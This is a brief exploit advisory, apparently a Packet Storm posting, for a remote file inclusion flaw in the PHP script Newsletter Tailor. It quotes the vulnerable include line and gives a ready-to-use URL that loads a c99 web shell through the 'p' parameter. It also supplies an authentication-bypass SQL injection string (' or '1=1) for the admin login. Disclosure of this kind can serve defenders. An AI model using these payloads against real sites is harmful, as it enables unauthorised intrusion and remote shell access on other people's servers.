Newsletter Tailor suffers from a remote file inclusion vulnerability.
d5a917e2d95aa23b1b63f5751fdbc33d48d9a93fcd4f61f46d71fdc6fb2c5508==============================================================================
[»] Newsletter Tailor Remote File Include Vulnerability
==============================================================================
[»] Script: [ Newsletter Tailor ]
[»] Language: [ PHP ]
[»] Download: [ http://sourceforge.net/projects/nlettertailor/ ]
[»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ SnakesTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
[»] Note: [ Thank you ViRuSMaN on script ]
###########################################################################
===[ Exploit ]=== include($p.".php");
[»] http://localhost/list/admin/index.php?p=http://localhost/c99.txt?
[»]Note: When you update the page prompts you to log on
[»](Auth Bypass) SQL Injection :user:' or '1=1 pass:' or '1=1
Then be accessed on the "sh3ll"
Author: Snakespc <-
###########################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed